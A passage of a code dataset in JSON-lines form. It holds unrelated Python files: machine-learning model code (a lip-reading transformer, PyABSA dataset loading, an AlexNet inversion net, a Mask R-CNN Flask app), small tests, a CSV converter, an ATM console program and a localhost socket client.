batch_size=hp.batch_size)\n\n if pertunate:\n dataset = dataset.map(map_data_for_feed_pertunated)\n else:\n dataset = dataset.map(map_data_for_feed)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef test_input(seq2seq=True, pertunate=False):\n\n dataset = input_fn('TRAIN')\n # dataset = dataset.shuffle(100000)\n dataset = dataset.map(reshape_data)\n dataset = dataset.batch(1)\n dataset = dataset.map(map_data_for_val)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef val_input(seq2seq=True):\n dataset = input_fn(\"TRAIN\")\n dataset = dataset.map(reshape_data)\n dataset = pad_sample(dataset, 4)\n # dataset = dataset.map(map_data_for_val)\n dataset = dataset.map(map_data_for_val)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef get_external_loss():\n return hyper_train.Onehot_CrossEntropy(hp.vocabulary_size, smoothing=0.1)\n\n\ndef get_image_processor():\n # with tf.device(\"/cpu:0\"):\n if tf.io.gfile.exists('pre_train/res50_pre_all'):\n res = tf.keras.models.load_model('pre_train/res50_pre_all')\n else:\n res = tf.keras.applications.resnet50.ResNet50(\n include_top=False, weights=None, input_shape=[32, 64, 3])\n # pooling='avg',\n # classes=10000)\n res.save('pre_train/res50_pre_all')\n return res\n\n\ndef model_structure(training=True, batch=0, mode='LIP'):\n if batch != 0:\n batch_size = batch\n else:\n batch_size = hp.batch_size\n img_input = tf.keras.layers.Input(\n shape=[PADDED_IMG, 32, 64, 3], dtype=tf.float32, name='Raw_input')\n if mode != 'LIP':\n img_input = tf.keras.layers.Input(\n shape=[None], dtype=tf.int64, name='src_text')\n if training:\n tgt = tf.keras.layers.Input(\n shape=[None], dtype=tf.int64, name='target_text')\n daedalus = core_lip_main.Daedalus(\n hp.max_sequence_length, hp.vocabulary_size, hp.embedding_size,\n hp.batch_size, hp.num_units, hp.num_heads, hp.num_encoder_layers,\n hp.num_decoder_layers, hp.dropout, hp.EOS_ID, hp.PAD_ID,\n hp.MASK_ID)\n # res_out = tf.reshape(res_out, [-1, 200, 4 * 4 * 512])\n logits = daedalus([img_input, tgt], training=training, mode=mode)\n logits = hyper_train.MetricLayer(hp.vocabulary_size)([logits, tgt])\n logits = hyper_train.CrossEntropy_layer(hp.vocabulary_size,\n 0.1)([logits, tgt])\n logits = tf.keras.layers.Lambda(lambda x: x, name=\"logits\")(logits)\n\n model = tf.keras.Model(inputs=[img_input, tgt], outputs=logits)\n else:\n daedalus = core_lip_main.Daedalus(\n hp.max_sequence_length, hp.vocabulary_size, hp.embedding_size,\n batch_size, hp.num_units, hp.num_heads, hp.num_encoder_layers,\n hp.num_decoder_layers, hp.dropout, hp.EOS_ID, hp.PAD_ID,\n hp.MASK_ID)\n metric = hyper_train.MetricLayer(hp.vocabulary_size)\n loss = hyper_train.CrossEntropy(hp.vocabulary_size, 0.1)\n ret = daedalus([img_input], training=training)\n outputs, scores = ret[\"outputs\"], ret[\"scores\"]\n model = tf.keras.Model(img_input, outputs)\n return model\n\n\ndef text_model_structure(training=True, batch=0):\n if batch != 0:\n batch_size = batch\n else:\n batch_size = hp.batch_size\n src = tf.keras.layers.Input(shape=[None], dtype=tf.int64, name='src_text')\n if training:\n tgt = tf.keras.layers.Input(\n shape=[None], dtype=tf.int64, name='target_text')\n daedalus = core_Transformer_model.Transformer(\n hp.max_sequence_length,\n hp.vocabulary_size,\n hp.embedding_size,\n hp.batch_size,\n hp.num_units,\n hp.num_heads,\n hp.num_encoder_layers,\n hp.num_decoder_layers,\n hp.dropout,\n hp.EOS_ID,\n hp.PAD_ID,\n )\n # res_out = tf.reshape(res_out, [-1, 200, 4 * 4 * 512])\n logits = daedalus([src, tgt], training=training)\n logits = hyper_train.MetricLayer(hp.vocabulary_size)([logits, tgt])\n logits = hyper_train.CrossEntropy_layer(hp.vocabulary_size,\n 0.1)([logits, tgt])\n logits = tf.keras.layers.Lambda(lambda x: x, name=\"logits\")(logits)\n\n model = tf.keras.Model(inputs=[src, tgt], outputs=logits)\n # else:\n # daedalus = core_lip_main.Daedalus(\n # hp.max_sequence_length, hp.vocabulary_size, hp.embedding_size,\n # batch_size, hp.num_units, hp.num_heads, hp.num_encoder_layers,\n # hp.num_decoder_layers, hp.dropout, hp.EOS_ID, hp.PAD_ID,\n # hp.MASK_ID)\n # metric = hyper_train.MetricLayer(hp.vocabulary_size)\n # loss = hyper_train.CrossEntropy(hp.vocabulary_size, 0.1)\n # ret = daedalus([img_input], training=training)\n # outputs, scores = ret[\"outputs\"], ret[\"scores\"]\n # model = tf.keras.Model(img_input, outputs)\n return model\n\n\ndef train_model():\n return model_structure(training=True)\n\n\ndef test_model(batch=1):\n return model_structure(training=False, batch=1)\n\n\ndef get_optimizer():\n return tf.keras.optimizers.Adam(beta_1=0.1, beta_2=0.98, epsilon=1.0e-9)\n # return hyper_optimizer.LazyAdam(beta_1=0.1, beta_2=0.98, epsilon=1.0e-9)\n\n\ndef get_callbacks():\n lr_fn = hyper_optimizer.LearningRateFn(hp.lr, hp.num_units,\n hp.learning_warmup)\n LRschedule = hyper_optimizer.LearningRateScheduler(lr_fn, 0)\n TFboard = tf.keras.callbacks.TensorBoard(\n log_dir=hp.model_summary_dir,\n write_grads=True,\n histogram_freq=100,\n write_images=True,\n update_freq=100)\n TFchechpoint = tf.keras.callbacks.ModelCheckpoint(\n hp.model_checkpoint_dir + '/model.{epoch:02d}.ckpt',\n save_weights_only=True,\n verbose=1)\n NaNchecker = tf.keras.callbacks.TerminateOnNaN()\n ForceLrReduce = tf.keras.callbacks.ReduceLROnPlateau(\n monitor='accuracy', factor=0.2, patience=1, mode='max', min_lr=0.00001)\n return [LRschedule, TFboard, TFchechpoint, NaNchecker, ForceLrReduce]\n","sub_path":"core_model_initializer.py","file_name":"core_model_initializer.py","file_ext":"py","file_size_in_byte":11783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"43712397","text":"import sys\nsys.path.insert(0,'../examples/')\nfrom lorenz63 import *\nfrom numpy import *\nfrom scipy.interpolate import *\ndef plot_clvs():\n fig, ax = subplots(1,2)\n s = [0.7,0.3]\n eps = 1.e-2\n d = 2\n u0 = random.rand(d,1)\n n = 10000\n u = step(u0,s,n) #shape: (n+1)xdx1\n u = u[1:].T[0] # shape:dxn\n du = dstep(u,s) #shape:nxdxd\n P = clvs(u,du,d).T #shape:nxdxd\n v1 = P[0]\n v2 = P[1]\n ax[0].plot([u[0] - eps*v1[0], u[0] + eps*v1[0]],\\\n [u[1] - eps*v1[1], u[1] + eps*v1[1]],\\\n lw=2.0, color='red')\n ax[1].plot([u[0] - eps*v2[0], u[0] + eps*v2[0]],\\\n [u[1] - eps*v2[1], u[1] + eps*v2[1]],\\\n lw=2.0, color='black')\n\n ax[0].set_title('$V^1$',fontsize=24)\n \n ax[1].set_title('$V^2$',fontsize=24)\n for j in range(2):\n ax[j].xaxis.set_tick_params(labelsize=24)\n ax[j].yaxis.set_tick_params(labelsize=24)\n\n\n return fig,ax\n\ndef test_dstep():\n n = 100\n u = rand(n,3)\n s = rand(3)\n du_ana = dstep(u, s).T\n eps = 1.e-7\n du_x = (step(u + eps*reshape([1.,0.,0.],[1,3]),s,1) - \\\n step(u - eps*reshape([1.,0.,0.],[1,3]),s,1))/\\\n (2*eps)\n du_y = (step(u + eps*reshape([0.,1.,0.],[1,3]),s,1) - \\\n step(u - eps*reshape([0.,1.,0.],[1,3]),s,1))/\\\n (2*eps)\n\n du_z = (step(u + eps*reshape([0.,0.,1.],[1,3]),s,1) - \\\n step(u - eps*reshape([0.,0.,1.],[1,3]),s,1))/\\\n (2*eps)\n du_fd_x = du_x[-1]\n du_fd_y = du_y[-1]\n du_fd_z = du_z[-1]\n\n assert(allclose(du_fd_x, du_ana[0]))\n assert(allclose(du_fd_y, du_ana[1]))\n assert(allclose(du_fd_z, du_ana[2]))\n\n\ndef test_d2step():\n n = 100\n u = rand(n,3)\n \n s = rand(3)\n d2_ana = d2step(u, s)\n\n eps = 1.e-10\n d2_x = (dstep(u + eps*reshape([1.,0.,0.],[1,3]), s) -\\\n dstep(u - eps*reshape([1.,0.,0.],[1,3]), s))/\\\n (2*eps)\n d2_y = (dstep(u + eps*reshape([0.,1.,0.],[1,3]), s) -\\\n dstep(u - eps*reshape([0.,1.,0.],[1,3]), s))/\\\n (2*eps)\n d2_z = (dstep(u + eps*reshape([0.,0.,1.],[1,3]), s) -\\\n dstep(u - eps*reshape([0.,0.,1.],[1,3]), s))/\\\n (2*eps)\n \n assert(allclose(d2_x, d2_ana[:,0])) \n assert(allclose(d2_y, d2_ana[:,1])) \n assert(allclose(d2_z, d2_ana[:,2])) \n","sub_path":"tests/test_lorenz63.py","file_name":"test_lorenz63.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"414749304","text":"\n\nfrom xai.brain.wordbase.verbs._smile import _SMILE\n\n#calss header\nclass _SMILES(_SMILE, ):\n\tdef __init__(self,): \n\t\t_SMILE.__init__(self)\n\t\tself.name = \"SMILES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"smile\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_smiles.py","file_name":"_smiles.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"145005211","text":"# Run_convert_CSV_to_JSON.py\n\n\"\"\"convert the CSV file of crunchbase into JSON\"\"\"\n\nimport csv # read the CSV file\nimport json # dump the data from CSV (CSVReader variable) into organizations.json\n\n\"\"\"creating a list of CSVFile rows\"\"\"\ndata = list()\nwith open('data/02-crunchbase/organizations.csv') as csvFile:\n csvReader = csv.DictReader(csvFile)\n for rows in csvReader:\n data.append(rows)\n\"\"\"dumping the rows into list of dictionary in json format\"\"\"\nwith open('data/02-crunchbase/organizations.json', 'w') as jsonFile:\n json.dump(data, jsonFile, indent=1)\n","sub_path":"Run_convert_CSV_to_JSON.py","file_name":"Run_convert_CSV_to_JSON.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515464539","text":"import random\r\nimport datetime\r\nfrom customer import Customer\r\n# Instance the class from customer.py\r\natm = Customer(id) # id -> python built-in function to return an identity of an object\r\n\r\nwhile True:\r\n pin = int(input('Enter Your PIN: '))\r\n \r\n # Verifikasi Pin\r\n tries_chance = 0\r\n while pin != atm.checkPin() and tries_chance < 3:\r\n pin = int(input('Wrong PIN, Enter Again: '))\r\n tries_chance += 1\r\n\r\n if tries_chance == 3:\r\n print('Error, please re-insert Your ATM card...')\r\n # Exit the program\r\n exit()\r\n \r\n # Menu ATM\r\n while True:\r\n print('\\nWelcome to ATM')\r\n \r\n print('\\n1 - Check Balance\\t2 - Withdraw\\t3 - Deposit\\t4 - Change Pin\\t5 - Exit')\r\n select_menu = int(input('\\nChoose Menu: '))\r\n \r\n # Cek Saldo\r\n if select_menu == 1:\r\n print(f'Your Balance is: IDR {atm.checkBalance()}\\n')\r\n # Ambil Uang\r\n elif select_menu == 2:\r\n nominal = int(input('Enter your withdraw nominal: '))\r\n verify_withdraw = input(f'It is correct nominal? (y/n) IDR {nominal}: ')\r\n if verify_withdraw == 'y':\r\n print(f'Initial Balance is IDR {atm.checkBalance()}')\r\n if atm.checkBalance() - nominal < 10000:\r\n print('Sorry, Your Balance cant lower than IDR 10000')\r\n elif nominal < atm.checkBalance():\r\n atm.withdrawBalance(nominal)\r\n print('Transaction Success')\r\n print(f'Current Balance is IDR {atm.checkBalance()}')\r\n else:\r\n print('Sorry, Your Balance is not enough')\r\n else:\r\n break\r\n # Simpan Uang\r\n elif select_menu == 3:\r\n nominal = int(input('Enter your deposit nominal: '))\r\n verify_deposit = input(f'It is correct nominal? (y/n) IDR {nominal}: ')\r\n if verify_deposit == 'y':\r\n atm.depositBalance(nominal)\r\n print(f'Current Balance is IDR {atm.checkBalance()}')\r\n else:\r\n break\r\n # Ganti Pin\r\n elif select_menu == 4:\r\n current_pin = int(input('Enter Your current PIN: '))\r\n if current_pin != atm.checkPin():\r\n print('Wrong PIN!')\r\n break\r\n \r\n new_pin = int(input('Enter Your new PIN: '))\r\n verify_new_pin = int(input('Enter Your new PIN again: '))\r\n if verify_new_pin == new_pin:\r\n # Ubah PIN awal ke PIN baru\r\n atm.pin = new_pin\r\n print('Success')\r\n else:\r\n print('Failed, Your new PIN is not match')\r\n # Cetak Receipt dan exit\r\n elif select_menu == 5:\r\n print(\"\\nReceipt is printed automatically when you leave.\\nPlease keep this receipt as proof of your transaction.\")\r\n print(f'\\nNo. Record{\" \": <7}: {random.randint(100000, 1000000)}')\r\n print(f'Date{\" \": <13}: {datetime.datetime.now()}')\r\n print(f'Current Balance{\" \": <2}: IDR {atm.checkBalance()}')\r\n print('Thank you for using ATM service')\r\n exit()\r\n # Menu tidak tersedia\r\n else:\r\n print('Sorry, that menu is not available')","sub_path":"Challenges/ATM/atm_program.py","file_name":"atm_program.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"453403497","text":"# -*- coding: utf-8 -*-\n# file: data_utils_for_training.py\n# time: 02/11/2022 15:39\n# author: YANG, HENG (杨恒)\n# github: https://github.com/yangheng95\n# GScholar: https://scholar.google.com/citations?user=NPq5a_0AAAAJ&hl=en\n# ResearchGate: https://www.researchgate.net/profile/Heng-Yang-17/research\n# Copyright (C) 2022. All Rights Reserved.\n\nimport tqdm\n\nfrom pyabsa.framework.dataset_class.dataset_template import PyABSADataset\nfrom pyabsa.utils.file_utils.file_utils import load_dataset_from_file\nfrom pyabsa.utils.pyabsa_utils import check_and_fix_labels, fprint\n\n\nclass BERTTADDataset(PyABSADataset):\n def load_data_from_dict(self, dataset_dict, **kwargs):\n pass\n\n def load_data_from_file(self, dataset_file, **kwargs):\n lines = load_dataset_from_file(\n self.config.dataset_file[self.dataset_type], config=self.config\n )\n\n all_data = []\n\n label_set1 = set()\n label_set2 = set()\n label_set3 = set()\n\n for i in tqdm.tqdm(range(len(lines)), desc=\"preparing dataloader\"):\n line = lines[i].strip().split(\"$LABEL$\")\n text, labels = line[0], line[1]\n text = text.strip()\n label, is_adv, adv_train_label = labels.strip().split(\",\")\n label, is_adv, adv_train_label = (\n label.strip(),\n is_adv.strip(),\n adv_train_label.strip(),\n )\n\n if is_adv == \"1\" or is_adv == 1:\n adv_train_label = label\n label = \"-100\"\n else:\n label = label\n adv_train_label = \"-100\"\n # adv_train_label = '-100'\n\n text_indices = self.tokenizer.text_to_sequence(\"{}\".format(text))\n\n data = {\n \"text_indices\": text_indices,\n \"text_raw\": text,\n \"label\": label,\n \"adv_train_label\": adv_train_label,\n \"is_adv\": is_adv,\n }\n\n label_set1.add(label)\n label_set2.add(adv_train_label)\n label_set3.add(is_adv)\n\n all_data.append(data)\n\n check_and_fix_labels(label_set1, \"label\", all_data, self.config)\n check_and_fix_adv_train_labels(\n label_set2, \"adv_train_label\", all_data, self.config\n )\n check_and_fix_is_adv_labels(label_set3, \"is_adv\", all_data, self.config)\n self.config.class_dim = len(label_set1 - {\"-100\"})\n self.config.adv_det_dim = len(label_set3 - {\"-100\"})\n\n self.data = all_data\n\n def __init__(self, config, tokenizer, dataset_type=\"train\", **kwargs):\n super().__init__(config, tokenizer, dataset_type, **kwargs)\n\n def __getitem__(self, index):\n return self.data[index]\n\n def __len__(self):\n return len(self.data)\n\n\ndef check_and_fix_adv_train_labels(label_set: set, label_name, all_data, config):\n # update output_dim, init model behind execution of this function!\n if \"-100\" in label_set:\n adv_train_label_to_index = {\n origin_label: int(idx) - 1 if origin_label != \"-100\" else -100\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n index_to_adv_train_label = {\n int(idx) - 1 if origin_label != \"-100\" else -100: origin_label\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n else:\n adv_train_label_to_index = {\n origin_label: int(idx)\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n index_to_adv_train_label = {\n int(idx): origin_label\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n if \"index_to_adv_train_label\" not in config.args:\n config.index_to_adv_train_label = index_to_adv_train_label\n config.adv_train_label_to_index = adv_train_label_to_index\n\n if config.index_to_adv_train_label != index_to_adv_train_label:\n # raise KeyError('Fail to fix the labels, the number of labels are not equal among all datasets!')\n config.index_to_adv_train_label.update(index_to_adv_train_label)\n config.adv_train_label_to_index.update(adv_train_label_to_index)\n num_label = {l: 0 for l in label_set}\n num_label[\"Sum\"] = len(all_data)\n for item in all_data:\n try:\n num_label[item[label_name]] += 1\n item[label_name] = adv_train_label_to_index[item[label_name]]\n except Exception as e:\n # fprint(e)\n num_label[item.polarity] += 1\n item.polarity = adv_train_label_to_index[item.polarity]\n fprint(\"Dataset Label Details: {}\".format(num_label))\n\n\ndef check_and_fix_is_adv_labels(label_set: set, label_name, all_data, config):\n # update output_dim, init model behind execution of this function!\n if \"-100\" in label_set:\n is_adv_to_index = {\n origin_label: int(idx) - 1 if origin_label != \"-100\" else -100\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n index_to_is_adv = {\n int(idx) - 1 if origin_label != \"-100\" else -100: origin_label\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n else:\n is_adv_to_index = {\n origin_label: int(idx)\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n index_to_is_adv = {\n int(idx): origin_label\n for origin_label, idx in zip(sorted(label_set), range(len(label_set)))\n }\n if \"index_to_is_adv\" not in config.args:\n config.index_to_is_adv = index_to_is_adv\n config.is_adv_to_index = is_adv_to_index\n\n if config.index_to_is_adv != index_to_is_adv:\n # raise KeyError('Fail to fix the labels, the number of labels are not equal among all datasets!')\n config.index_to_is_adv.update(index_to_is_adv)\n config.is_adv_to_index.update(is_adv_to_index)\n num_label = {l: 0 for l in label_set}\n num_label[\"Sum\"] = len(all_data)\n for item in all_data:\n try:\n num_label[item[label_name]] += 1\n item[label_name] = is_adv_to_index[item[label_name]]\n except Exception as e:\n # fprint(e)\n num_label[item.polarity] += 1\n item.polarity = is_adv_to_index[item.polarity]\n fprint(\"Dataset Label Details: {}\".format(num_label))\n","sub_path":"pyabsa/tasks/TextAdversarialDefense/dataset_utils/__plm__/data_utils_for_training.py","file_name":"data_utils_for_training.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"877309","text":"\"\"\"\nCopyright 2020 The Magma Authors.\n\nThis source code is licensed under the BSD-style license found in the\nLICENSE file in the root directory of this source tree.\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport unittest\n\nfrom magma.common import metrics_export\nfrom magma.monitord.metrics import SUBSCRIBER_ICMP_LATENCY_MS\n\n\nclass MetricTests(unittest.TestCase):\n \"\"\"\n Tests for the Service303 metrics interface\n \"\"\"\n def test_metrics_defined(self):\n \"\"\" Test that all metrics are defined in proto enum \"\"\"\n SUBSCRIBER_ICMP_LATENCY_MS.labels('IMSI00000001').observe(10.33)\n\n metrics_protos = list(metrics_export.get_metrics())\n for metrics_proto in metrics_protos:\n if metrics_proto.name == \"subscriber_latency_ms\":\n metric = metrics_proto.metric[0]\n self.assertEqual(metric.histogram.sample_sum, 10.33)\n self.assertEqual(metric.label[0].value, 'IMSI00000001')\n","sub_path":"modules/lte/gateway/python/magma/monitord/tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79500274","text":"import json\n\nimport socket\n\nimport asyncio\n\nfrom utility.configuration.configuration import ConfigMetaclass, ConfigAttribute\n\n\nclass SocketConfig(metaclass=ConfigMetaclass):\n\n buffer_size = ConfigAttribute('buffer_size', int, 1500000)\n\n encoding = ConfigAttribute('encoding', str, 'utf-8')\n\n host = ConfigAttribute('host', str, 'localhost')\n\n port = ConfigAttribute('port', int, 8000)\n\n\n def __init__(self, path=None):\n\n if path:\n\n with open(path, 'r') as file:\n\n config_json = json.load(file)\n\n for name, value in config_json.items():\n\n setattr(self, name, value)\n\n\nclass SocketManager(metaclass=ConfigMetaclass):\n\n def __init__(self):\n\n self._config = SocketConfig()\n\n\n @property\n def address(self):\n\n return (self._config.host, self._config.port)\n\n\n async def send_request_message(self,TypeOfSend, **kwargs):\n\n with socket.socket() as sock:\n\n\n\n if TypeOfSend=='sendtoall':\n context = {'action':'sendall', 'message':kwargs}\n elif TypeOfSend=='sendto':\n context = {'action': 'sendto', 'message': kwargs}\n elif TypeOfSend=='auth':\n context = {'action': 'auth', 'message': kwargs}\n elif TypeOfSend =='MyLogo':\n context = {\"action\": 'MyLogo', 'message': kwargs}\n else:\n context = {'action': TypeOfSend, 'message': kwargs}\n\n response_str = json.dumps(context)\n\n response_bytes = response_str.encode(self._config.encoding)\n\n sock.connect(self.address)\n sock.send(response_bytes)\n\n\n def receive_response_message(self):\n\n with socket.socket() as sock:\n\n sock.connect(self.address)\n\n while True:\n\n response_bytes = sock.recv(self._config.buffer_size)[0:]\n\n return response_bytes.decode(self._config.encoding)\n","sub_path":"client/appcore/socketmanager.py","file_name":"socketmanager.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"100990445","text":"import torchvision\nimport torchvision.transforms as transforms\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.models as models\n\n\nclass InverseNet(nn.Module):\n\n def __init__(self, l):\n super(InverseNet, self).__init__()\n self.an = models.alexnet(pretrained=True)\n feats = self.an.features\n cl = self.an.classifier\n if l < 5:\n self.conv_lin = 'conv'\n split_point = 0\n conv_cntr = 0\n for lay in feats:\n if isinstance(lay, nn.Conv2d):\n conv_cntr += 1\n split_point += 1\n\n if conv_cntr == l:\n break\n \n self.an.features = nn.Sequential(*list(feats)[:split_point+1])\n \n elif l >=6 and l <=8:\n self.conv_lin = 'lin'\n split_point = 0\n lin_cntr = 5\n for lay in feats:\n if isinstance(lay, nn.Linear):\n lin_cntr += 1\n split_point += 1\n\n if lin_cntr == l:\n break\n \n self.an.cl = nn.Sequential(*list(cl)[:split_point+1])\n\n # Freeze base network parameters\n for param in self.an.parameters():\n param.requires_grad = False\n\n self.lin_net1 = nn.Sequential(nn.Linear(1000, 4096),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(4096, 4096),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(4096, 4096),\n nn.LeakyReLU(0.2, inplace=True))\n\n self.lin_net2 = nn.Sequential(nn.ConvTranspose2d(256, 256, 5, stride=2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(256, 128, 5, stride=2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(128, 64, 5, stride=2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(64, 32, 5, stride=2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(32, 3, 8, stride=2),\n nn.LeakyReLU(0.2, inplace=True))\n \n def forward(self, x):\n x = self.an(x)\n if self.conv_lin == 'conv':\n pass\n elif self.conv_lin == 'lin':\n x = self.lin_net1(x)\n x = x.view(x.size(0), 256, 4, 4)\n x = self.lin_net2(x)\n return x\n\ndef main():\n transform = transforms.Compose([transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n \n epochs = 1\n batch_size = 4\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n imagenet_train = torchvision.datasets.ImageFolder('data/train', transform=transform)\n trainloader = torch.utils.data.DataLoader(imagenet_train, batch_size=batch_size, shuffle=True, num_workers=2)\n\n imagenet_test = torchvision.datasets.ImageFolder('data/test', transform=transform)\n testloader = torch.utils.data.DataLoader(imagenet_test, batch_size=batch_size, shuffle=True, num_workers=2)\n\n model = InverseNet(8)\n model = model.to(device)\n criterion = nn.MSELoss()\n optimizer = optim.Adam(filter(lambda x: x.requires_grad, model.parameters()))\n\n\n for e in range(epochs):\n total_loss = 0.0\n for i, data in enumerate(trainloader):\n img, cl = data\n img = img.to(device)\n\n optimizer.zero_grad()\n\n out = model(img)\n\n loss = criterion(out, img)\n loss.backward()\n\n total_loss += loss\n\n optimizer.step()\n\n if i % 500 == 0 and i != 0:\n print('Loss on image ' + str(batch_size * i) + ', ' + \"{0:.5f}\".format(total_loss))\n print('-' * 10)\n total_loss = 0.0\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"inversion.py","file_name":"inversion.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"114798717","text":"'''\nSome script functions are derived and modified based on the sample tutorials-ballons.py in the repo\nCredit should be given to the Repo owner Matterport, Inc\n\nhonour the original author:\nCopyright (c) 2018 Matterport, Inc.\nLicensed under the MIT License (see LICENSE for details)\ntutorial originally Written by Waleed Abdulla\n'''\n\n'''\nA simple flask application allow users to select detection or applying color splash on an uploaded images.\n\nThe app will load the pretrained model and initialize it during the flask setup progress\nIt is found that the computer must run the detection immediately loaded the model in order to save the model into the\nmemory, otherwise users will not be able to run detection at all, as the model is not in the memory\n\nNote:\n--Only jpg images will be allowed.\n--Depending on the computational power, the initializing time and detection time can vary [greatly].\n--It is highly recommend that users should have a decent graphic card, and have NVIDIA GPU Computing Toolkit installed\n--This repo is found to be only runnable on a specific combinations of library versions shown as below:\nGPU: Acceptable graphic cards, here we using GTX1080\nCUDA: V10.0\ntensorflow: 1.14-gpu\nkeras:2.1.3\n'''\nfrom flask import Flask, request, render_template, jsonify, redirect\nfrom datetime import timedelta\n\n\nfrom werkzeug.utils import secure_filename\n###################################\nimport os\nimport sys\nimport random\nimport numpy as np\nimport skimage.io\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\n\nimport fruit\n###############################configure necessary path#######################################################\n# Root directory of the project\nROOT_DIR = os.path.abspath(\"../../\")\n\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\n\n# Import config\nsys.path.append(os.path.join(ROOT_DIR, \"samples/pearBanana/\")) # To find local version\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n# Local path to trained weights file\nCOCO_MODEL_PATH = os.path.join(ROOT_DIR, \"logs/res101-2class/mask_rcnn_fruit_0065.h5\")\n\n# Directory of images to run detection on\nIMAGE_DIR = os.path.join(ROOT_DIR, \"samples/pearBanana/static/initializeImage\")\n\n\nUPLOAD_FOLDER = os.path.join(ROOT_DIR, \"samples/pearBanana/upload_images\")\nALLOWED_EXTENSIONS = set(['jpg'])\n\n########################configure flask object#################\napp = Flask(__name__, template_folder='')\n\n# avoid caching, which prevent showing the detection/splash result\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = timedelta(seconds=1)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nclass InferenceConfig(fruit.FruitConfig):\n # Set batch size to 1 since we'll be running inference on\n # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n POST_NMS_ROIS_INFERENCE = 2000\n\n # proved->the higher the image quality, the better the detection accuracy\n # How every, the detection speed will be slowed dramatically\n # depending on your computational power,\n # you might need to modify the 'IMAGE_MAX_DIM = 3520' to fit your graphic card memory capacity\n # as a guidance, we use GTX1080 with 8gb memory, 3520p is the maximum resolution can be dealt with.\n IMAGE_RESIZE_MODE = \"square\"\n IMAGE_MIN_DIM = 800\n IMAGE_MAX_DIM = 3520 # was 1024\n\n # Non-max suppression threshold to filter RPN proposals.\n # You can increase this during training to generate more propsals.\n RPN_NMS_THRESHOLD = 0.7\n\n # Minimum probability value to accept a detected instance\n # ROIs below this threshold are skipped\n DETECTION_MIN_CONFIDENCE = 0.6\n\n # Max number of final detections\n DETECTION_MAX_INSTANCES = 200\n\n###### create model in inference mode, must run a detection imeediately to save the model to computer memory #######\nconfig = InferenceConfig()\n# config.display()\nprint('\\n\\n -----Please be patient, the initializing process can take a while depending on your computability-----\\n\\n')\n# Create model object in inference mode.\nmodel = modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config)\n\n# Load weights trained on MS-COCO\nmodel.load_weights(COCO_MODEL_PATH, by_name=True)\n\nclass_names = ['BG', 'banana', 'pear']\n\nfile_names = next(os.walk(IMAGE_DIR))[2]\nimage = skimage.io.imread(os.path.join(IMAGE_DIR, random.choice(file_names)))\nprint('\\n\\n -----Please be patient, almost done initialing-----\\n\\n')\n\n# Run detection\nresults = model.detect([image], verbose=1)\nr = results[0] ### the length of this will be the count of items found\nprint('\\n\\n -----Initialization Complete -----\\n\\n')\n\ndef detect_onsite(model):\n class_names = ['BG', 'banana', 'pear']\n\n user_file_names = next(os.walk(UPLOAD_FOLDER))[2]\n names_chosen = random.choice(user_file_names)\n image = skimage.io.imread(os.path.join(UPLOAD_FOLDER, names_chosen))\n # Run 